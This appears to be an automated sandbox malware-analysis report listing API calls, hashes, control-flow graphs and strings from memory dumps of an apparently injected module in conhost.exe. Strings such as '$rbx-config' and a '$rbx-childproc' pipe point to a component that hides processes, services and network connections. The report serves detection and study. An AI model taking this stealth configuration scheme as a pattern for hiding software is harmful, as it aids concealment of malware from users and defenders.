                                            • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction Fuzzy Hash: D1A10723704EA04AFBA8DB75F4483AF7BA1E747794F144217DE992769ACE74C04AC702

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 2135414181-3414887735
                                            • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction ID: 70a983c59232ec985ca3a6a2be5a176da28e81d2d64ca5e4aaa57126921e7b2f
                                            • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction Fuzzy Hash: CD71F927311E6587EB58EF65F89869A33A4FB86F88F401213DE4D57B6ADE38C448C341

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction ID: 80291b581d2a25a7232537f4df9082142d1da61205f700674305e112e863593d
                                            • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction Fuzzy Hash: F8513832311B9497EBA8DF62F44835B77A1F789F99F444226DA4A07719DF3CC0598701

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                            • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                            • API String ID: 740688525-1880043860
                                            • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction ID: c79a9d86f3b19d078a853590984c0720b32ff8f9135d9cd8780e22b4156c37c0
                                            • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction Fuzzy Hash: 90518423701E2453EB9D9B66B81836B3250BB4ABB0F5807279D39473D6EF38D4498642

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU user(*)\Running Time
                                            • API String ID: 1943346504-1805530042
                                            • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction ID: f8820993cc94fc6231c47b99bd42cb84e2527a97a663e61442b4a4d370a7a6de
                                            • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction Fuzzy Hash: 1E31B123B04EA097FB6ACF12B80835BB3A0F789B95F4402279E4983726DF38D4598341

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU user(*)\Utilization Percentage
                                            • API String ID: 1943346504-3507739905
                                            • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction ID: 995721abaf929b9172070fab9879c0148e00e6b6940efbbc1da075e9d5196b1a
                                            • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction Fuzzy Hash: A4313022710FA587FB98DF22B84875B73A1FB85F95F4442279F4A43726DF38D4498601
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000003.2867908713.000002A5AF330000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A5AF330000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_3_2a5af330000_conhost.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                            • Instruction ID: d67c4e84e13b7181da2d6704d5405f88b377d19bcfbe0063179f989f313ad541
                                            • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                            • Instruction Fuzzy Hash: 58D16D27705B50C7EB68DB69A4483AE37A1F746798F100317EA8A57B9ADF34D188C702

                                            Control-flow Graph

                                            control_flow_graph 313 2a5af36a22c-2a5af36a294 call 2a5af36b144 316 2a5af36a29a-2a5af36a29d 313->316 317 2a5af36a6f5-2a5af36a6fb call 2a5af36c388 313->317 316->317 318 2a5af36a2a3-2a5af36a2a9 316->318 320 2a5af36a378-2a5af36a38a 318->320 321 2a5af36a2af-2a5af36a2b3 318->321 323 2a5af36a645-2a5af36a649 320->323 324 2a5af36a390-2a5af36a394 320->324 321->320 325 2a5af36a2b9-2a5af36a2c4 321->325 328 2a5af36a64b-2a5af36a652 323->328 329 2a5af36a682-2a5af36a68c call 2a5af369324 323->329 324->323 326 2a5af36a39a-2a5af36a3a5 324->326 325->320 327 2a5af36a2ca-2a5af36a2cf 325->327 326->323 332 2a5af36a3ab-2a5af36a3af 326->332 327->320 333 2a5af36a2d5-2a5af36a2df call 2a5af369324 327->333 328->317 330 2a5af36a658-2a5af36a67d call 2a5af36a6fc 328->330 329->317 339 2a5af36a68e-2a5af36a6ad call 2a5af368070 329->339 330->329 336 2a5af36a575-2a5af36a581 332->336 337 2a5af36a3b5-2a5af36a3f0 call 2a5af369704 332->337 333->339 347 2a5af36a2e5-2a5af36a310 call 2a5af369324 * 2 call 2a5af369a0c 333->347 336->329 340 2a5af36a587-2a5af36a58b 336->340 337->336 351 2a5af36a3f6-2a5af36a3ff 337->351 344 2a5af36a59b-2a5af36a5a3 340->344 345 2a5af36a58d-2a5af36a599 call 2a5af3699cc 340->345 344->329 350 2a5af36a5a9-2a5af36a5b6 call 2a5af3695a4 344->350 345->344 360 2a5af36a5bc-2a5af36a5c4 345->360 380 2a5af36a312-2a5af36a316 347->380 381 2a5af36a330-2a5af36a33a call 2a5af369324 347->381 350->329 350->360 356 2a5af36a403-2a5af36a435 351->356 357 2a5af36a43b-2a5af36a447 356->357 358 2a5af36a568-2a5af36a56f 356->358 357->358 362 2a5af36a44d-2a5af36a46c 357->362 358->336 358->356 363 2a5af36a5ca-2a5af36a5ce 360->363 364 2a5af36a6d8-2a5af36a6f4 call 2a5af369324 * 2 call 2a5af36c2f4 360->364 366 2a5af36a558-2a5af36a55d 362->366 367 2a5af36a472-2a5af36a4af call 2a5af3699e0 * 2 362->367 368 2a5af36a5e1 363->368 369 2a5af36a5d0-2a5af36a5df call 2a5af3699cc 363->369 364->317 366->358 393 2a5af36a4e2-2a5af36a4e5 367->393 376 2a5af36a5e3-2a5af36a5ed call 
2a5af36b1dc 368->376 369->376 376->329 391 2a5af36a5f3-2a5af36a643 call 2a5af369634 call 2a5af369838 376->391 380->381 385 2a5af36a318-2a5af36a323 380->385 381->320 396 2a5af36a33c-2a5af36a35c call 2a5af369324 * 2 call 2a5af36b1dc 381->396 385->381 390 2a5af36a325-2a5af36a32a 385->390 390->317 390->381 391->329 399 2a5af36a4e7-2a5af36a4ee 393->399 400 2a5af36a4b1-2a5af36a4d7 call 2a5af3699e0 call 2a5af36a96c 393->400 418 2a5af36a373 396->418 419 2a5af36a35e-2a5af36a368 call 2a5af36b2cc 396->419 404 2a5af36a55f 399->404 405 2a5af36a4f0-2a5af36a4f4 399->405 415 2a5af36a4f9-2a5af36a556 call 2a5af36a158 400->415 416 2a5af36a4d9-2a5af36a4dc 400->416 406 2a5af36a564 404->406 405->367 406->358 415->406 416->393 418->320 423 2a5af36a6d2-2a5af36a6d7 call 2a5af36c2f4 419->423 424 2a5af36a36e-2a5af36a6d1 call 2a5af368f84 call 2a5af36ad28 call 2a5af369178 419->424 423->364 424->423
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction ID: ed20ad7f05566e3391daa9a5dfa6f347c9fa2e82f7603bf670514f84363d5748
                                            • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction Fuzzy Hash: C5D16073704B908BEFA8DB65A44839F77A0F746798F100217DA8957796CF38C498D702

                                            Control-flow Graph

                                            control_flow_graph 434 2a5af36104c-2a5af3610b9 RegQueryInfoKeyW 435 2a5af3611b5-2a5af3611d0 434->435 436 2a5af3610bf-2a5af3610c9 434->436 436->435 437 2a5af3610cf-2a5af36111f RegEnumValueW 436->437 438 2a5af3611a5-2a5af3611af 437->438 439 2a5af361125-2a5af36112a 437->439 438->435 438->437 439->438 440 2a5af36112c-2a5af361135 439->440 441 2a5af361147-2a5af36114c 440->441 442 2a5af361137 440->442 444 2a5af361199-2a5af3611a3 441->444 445 2a5af36114e-2a5af361193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 441->445 443 2a5af36113b-2a5af36113f 442->443 443->438 446 2a5af361141-2a5af361145 443->446 444->438 445->444 446->441 446->443
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction ID: 28a3a71b1a28244ea36a1ca8b3e063b4eb4d62e1d645779944e509c5439b0e40
                                            • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction Fuzzy Hash: BF414B33314B949BE7A4DF21E44839B77A1F389B98F44822ADB8907A58DF38D449CB41

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                            • String ID: \\.\pipe\$rbx-childproc
                                            • API String ID: 166002920-1828357524
                                            • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction ID: d14f723f8ed829822c89f5e2cfe1bc46318c53019ffdce31611c9d438ba10ac0
                                            • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction Fuzzy Hash: 63112632719A5083E758CB21F41875AB7A0F38AB95F944316EA9903AA9DF3CC148CB41
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000003.2867908713.000002A5AF330000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A5AF330000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_3_2a5af330000_conhost.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction ID: 75e0045217a7e43ccaff272f347870daecc911886bbc532241f35b8a89f751e9
                                            • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction Fuzzy Hash: 8F818F23708E6587FB6CDB29B4493AF2690AB477C1F4443279E4587397DE38C44E8742

                                            Control-flow Graph
                                            (graph image not extracted) Function entry 2a5af367c50; basic blocks span 2a5af367c50-2a5af367f5f and call __scrt_dllmain_crt_thread_attach and __scrt_dllmain_after_initialize_c plus internal helpers.
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction ID: 6a99c8e0591ed7087b8718fd936989789c2f6efed9634cc5f300d680653cd6cb
                                            • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction Fuzzy Hash: C981D163710E6047FBDC9B25B44D3AB6692AB87BC4F944317AA0947397DF78C84D8312

                                            Control-flow Graph
                                            (graph image not extracted) Function entry 2a5af369aac; basic blocks span 2a5af369aac-2a5af369bf9 and call LoadLibraryExW, GetLastError, FreeLibrary and GetProcAddress.
                                            APIs
                                            • LoadLibraryExW.KERNEL32(?,?,?,000002A5AF369C6B,?,?,?,000002A5AF36945C,?,?,?,?,000002A5AF368F65), ref: 000002A5AF369B31
                                            • GetLastError.KERNEL32(?,?,?,000002A5AF369C6B,?,?,?,000002A5AF36945C,?,?,?,?,000002A5AF368F65), ref: 000002A5AF369B3F
                                            • LoadLibraryExW.KERNEL32(?,?,?,000002A5AF369C6B,?,?,?,000002A5AF36945C,?,?,?,?,000002A5AF368F65), ref: 000002A5AF369B69
                                            • FreeLibrary.KERNEL32(?,?,?,000002A5AF369C6B,?,?,?,000002A5AF36945C,?,?,?,?,000002A5AF368F65), ref: 000002A5AF369BD7
                                            • GetProcAddress.KERNEL32(?,?,?,000002A5AF369C6B,?,?,?,000002A5AF36945C,?,?,?,?,000002A5AF368F65), ref: 000002A5AF369BE3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction ID: d1b03e9ac34db2265fe7d26f89378359d40063cef71ce41dfcf072e1c73c7cba
                                            • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction Fuzzy Hash: 15316122313E6492EF99DB16B8087A73394F74ABA0F5907279D1A47796DF3CC44C8352
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction ID: 22a39c5d958196bcb3a0b6b4e22296f4ce685981477b0783177a06bf8eb8e280
                                            • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction Fuzzy Hash: B7114C23310E6087E758CB52B85871A76A0B789BE4F444316EA5A87B95DF3CC5088741
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction ID: 9145d667348f50b5d57d8eb2e15a7918ec1153cc53b8dad76a120805eae4d854
                                            • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction Fuzzy Hash: 44D16477308F9882DBA49B0AF49835B67A0F789B88F500217EA8D477A6DF38C555CB41
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Free$CurrentThread
                                            • String ID:
                                            • API String ID: 564911740-0
                                            • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction ID: fe9a60ac80b48ddef9e0d1b9a9cbb9d440ced9b36274ff17718f182462466e21
                                            • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction Fuzzy Hash: FE518722302F6597EF8DDF15F85829773A1AB06748F444A27A61D077A6EF78C51CC382
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: $rbx-
                                            • API String ID: 756756679-3661604363
                                            • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction ID: 467d8dbdfa9e06ebbfa97c665612e9d950b9f133336c1f59128c9aeee4634ec9
                                            • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction Fuzzy Hash: B3317E23701FA183FB99DF16B58876B63A0FB56B84F0842238F4947B56EF38D4698701
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: ErrorLast$Value$FreeHeap
                                            • String ID:
                                            • API String ID: 365477584-0
                                            • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction ID: e180a0fe980a3e263765049bb6bfde7fb3b526674728081bd2d56badd9f5dcb2
                                            • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction Fuzzy Hash: A5114F27305E6083FB9CA732781D36F2291AB877D5F544727A866567CBDE28D4094702
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
